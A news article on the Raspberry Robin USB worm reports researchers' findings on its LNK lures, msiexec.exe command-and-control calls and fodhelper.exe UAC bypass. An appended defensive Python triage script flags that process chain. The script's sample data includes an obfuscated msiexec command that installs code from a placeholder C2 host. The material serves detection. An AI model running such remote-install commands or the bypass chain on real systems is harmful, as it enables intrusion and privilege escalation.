USB-based Wormable Malware Targets Windows Installer

Activity dubbed ‘Raspberry Robin’ uses Microsoft Standard Installer and other legitimate processes to communicate with threat actors and execute nefarious commands.

Wormable malware dubbed Raspberry Robin has been active since last September and is wriggling its way through USB drives onto Windows machines, where it uses Microsoft Standard Installer and other legitimate processes to install malicious files, researchers have found.

Researchers at Red Canary Intelligence began tracking the malicious activity in the fall, when it surfaced as a handful of detections with similar characteristics. Jason Killam from Red Canary’s Detection Engineering team first observed them in multiple customers’ environments.

Once the worm spreads via a USB drive to someone’s machine, the activity relies on msiexec.exe to call out to its infrastructure, which is often comprised of QNAP devices, using HTTP requests that contain a victim’s user and device names, Red Canary’s Lauren Podber and Stef Rand wrote in a blog post published Thursday.

Researchers also observed Raspberry Robin use TOR exit nodes as additional command and control (C&C) infrastructure, they wrote. Eventually the worm installs malicious dynamic link library (DLL) files found on the infected USB.

While researchers first noticed Raspberry Robin as early as September 2021, most of the activity observed by Red Canary occurred during January of this year, researchers said.

Unanswered Questions

Though researchers observed various processes and executions by the malicious activity, they acknowledged that these observations have left a number of unanswered questions.

The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this infection occurs offline or “otherwise outside of our visibility,” researchers said.

They also don’t know why Raspberry Robin installs a malicious DLL. They believe it may be an attempt to establish persistence on an infected system, but there is not enough evidence to make this conclusive, researchers acknowledged.

However, the biggest question mark surrounding the worm is the objective of the threat actors behind it, researchers said.

“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.

Initial Access and Execution

Infected removable drives—typically USB devices—introduce the Raspberry Robin worm as a shortcut LNK file masquerading as a legitimate folder on the infected USB device, researchers said. LNK files are Windows shortcuts that point to and are used to open another file, folder, or application.

Soon after the infected drive is connected to the system, the worm updates the UserAssist registry entry and records execution of a ROT13-ciphered value referencing a LNK file when deciphered. For example, researchers observed the value q:\erpbirel.yax being deciphered to d:\recovery.lnk, they wrote.

Execution commences when Raspberry Robin uses cmd.exe to read and execute a file stored on the infected external drive, researchers said.

“The command is consistent across Raspberry Robin detections we have seen so far, making it reliable early evidence of potential [worm] activity,” they noted.

In the next phase of execution, cmd.exe typically launches explorer.exe and msiexec.exe. The former’s command line can be a mixed-case reference to an external device; a person’s name, like LAUREN V; or the name of the LNK file, researchers said.

The worm “also extensively uses mixed-case letters in its commands,” most likely to avoid detection, researchers added.

Secondary Execution

Raspberry Robin uses the second executable launched, msiexec.exe, to attempt external network communication to a malicious domain for command and control purposes, researchers revealed.

In several examples of the activity that researchers have observed, the worm has used msiexec.exe to install a malicious DLL file although, as mentioned before, they still aren’t certain what the purpose of the DLL is.

The worm also uses msiexec.exe to launch a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command, they observed.

“Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt,” researchers noted. As this is unusual behavior for the utility, this activity can be used to detect the presence of Raspberry Robin on an infected machine, they said.

The rundll32.exe command then starts another legitimate Windows utility, odbcconf.exe, and passes in additional commands to execute and configure the recently installed malicious DLL file, researchers said.
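
A defender-side triage sketch for the indicators described above, added here as an example and not Red Canary's own detection logic: it decodes ROT13 UserAssist names and flags the msiexec.exe -> fodhelper.exe -> rundll32.exe -> odbcconf.exe lineage and mixed-case binary names. The event field names, sample events and placeholder domain are constructed, and the check for a URL on the msiexec.exe command line is an assumption.

```python
import codecs
import re

# Parent -> child pairs from the execution chain described in the article.
LINEAGE = {("msiexec.exe", "fodhelper.exe"),
           ("fodhelper.exe", "rundll32.exe"),
           ("rundll32.exe", "odbcconf.exe")}

def decode_userassist(name):
    """UserAssist value names are ROT13-encoded; return the real path."""
    return codecs.decode(name, "rot_13")

def lnk_off_system_drive(name, system_drive="c:"):
    """True if the decoded entry is a .lnk launched from a non-system drive letter."""
    path = decode_userassist(name).lower()
    return bool(re.match(r"[a-z]:\\.*\.lnk$", path)) and not path.startswith(system_drive)

def mixed_case(word):
    """True for erratic casing such as 'mSIexEc' (not lower, UPPER or Capitalized)."""
    return word not in (word.lower(), word.upper(), word.capitalize())

def triage(events):
    """Return (index, reason) findings for a list of process-creation events."""
    findings = []
    for i, ev in enumerate(events):
        parent, image = ev["parent"].lower(), ev["image"].lower()
        if (parent, image) in LINEAGE:
            findings.append((i, f"lineage {parent} -> {image}"))
        # Assumption: the remote URL is visible on the msiexec command line.
        if image == "msiexec.exe" and re.search(r"https?://", ev["cmdline"], re.I):
            findings.append((i, "msiexec with remote URL"))
        # First command-line token, extension stripped (unquoted paths only).
        exe = (ev["cmdline"].split() or [""])[0].rsplit(".", 1)[0]
        if mixed_case(exe):
            findings.append((i, f"mixed-case binary name {exe!r}"))
    return findings

# Constructed sample events (hypothetical field names, placeholder domain).
EVENTS = [
    {"parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "mSIexEc /q /i hTtP://c2.example.invalid/x"},
    {"parent": "msiexec.exe", "image": "fodhelper.exe", "cmdline": "fodhelper.exe"},
    {"parent": "fodhelper.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe sample.dll"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    print(decode_userassist(r"q:\erpbirel.yax"), triage(EVENTS))
```

The mixed-case check is a weak signal on its own, since CamelCase names such as PowerShell also match; it is most useful alongside the lineage findings.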
